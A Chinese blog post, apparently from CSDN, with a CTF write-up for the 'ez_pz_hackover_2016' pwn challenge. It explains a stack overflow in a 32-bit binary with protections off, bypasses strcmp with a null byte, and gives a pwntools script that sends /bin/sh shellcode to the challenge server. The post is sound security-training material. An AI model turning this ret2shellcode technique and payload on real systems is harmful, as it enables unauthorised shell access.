ez_pz_hackover_2016

最新推荐文章于 2023-11-07 23:06:56 发布
最新推荐文章于 2023-11-07 23:06:56 发布
阅读量181 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133149736
版权

ez_pz_hackover_2016

Arch:     i386-32-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位,保护全关

int chall()
{
  size_t v0; // eax
  int result; // eax
  char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
  _BYTE *v3; // [esp+40Ch] [ebp-Ch]

  printf("Yippie, lets crash: %p\n", s);
  printf("Whats your name?\n");
  printf("> ");
  fgets(s, 1023, stdin);
  v0 = strlen(s);
  v3 = memchr(s, 10, v0);
  if ( v3 )
    *v3 = 0;
  printf("\nWelcome %s!\n", s);
  result = strcmp(s, "crashme");
  if ( !result )
    return vuln((char)s, 0x400u);
  return result;
}

这里不存在漏洞点

void *__cdecl vuln(char src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);
}

漏洞点在这里,通过上面输入的数据传进这里并执行栈

思路

我们需要计算不同函数栈的距离

需要绕过strcmp和memchr,\x00均可绕过,答案就呼之欲出了,

调好偏移,使返回地址指向shellcode就可以getshell了

参考

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27018,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048600')

sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
leak=get_addr_int()-(0x1c)
pl=b'crashme\x00'+b'a'*(0x12)+p64(leak)+sc
sla(b'> ',pl)

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
3S软件
Zzzpiu的博客
12-29 435
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
m0_55368674的博客
01-19 320
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
ez_pz_hackover_2016 wp (python3)
Kata_Jhin的博客
10-08 156
ez_pz_hackover_2016 wp (python3)
memcpy
weixin_45959515的博客
08-26 148
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
【pwn】ez_pz_hackover_2016 --pwngdb和pwntools的结合,动态调试
最新发布
question55的博客
11-07 94
该函数的作用是将src指向的内存区域中的前n个字节的数据复制到dest指向的内存区域中。由于该函数返回void*类型,通常在使用时需要将其转换为目标类型的指针。memcpy函数是C/C++语言中常用的内存拷贝函数,用于将一块内存中的数据复制到另一块内存中。dest 是目标内存区域的指针,即要将数据复制到的位置。src 是源内存区域的指针,即要从哪里复制数据。n 是要复制的字节数。
buuctf ez_pz_hackover_2016
qq_73625550的博客
05-26 480
使用gdb调试来计算偏移,ret2shecllcode,栈溢出
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 407
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 174
ez_pz_hackover_2016
BUUCTF pwn——ez_pz_hackover_2016
CNS-Enterprise BCC-1701-J
04-28 140
BUUCTF 做题练习
BUUCTF【ez_pz_hackover_2016
weixin_51055545的博客
02-14 1256
BUUCTF【ez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
ez_udp_connect
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 TCP 更高。 这个函数通常会传入目标 IP 地址和端口号,然后返回一个文件描述符或套接字,用于后续的数据传输。在使用 `ez_udp_connect` 前,需要先创建一个 UDP 套接字,使用 `socket` 函数即可。函数声明如下: ```c int ez_udp_connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); ``` 其中,`sockfd` 表示创建好的 UDP 套接字的文件描述符或套接字,`addr` 和 `addrlen` 表示要连接的目标地址和端口号。函数返回值为 0 表示成功,否则表示失败。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值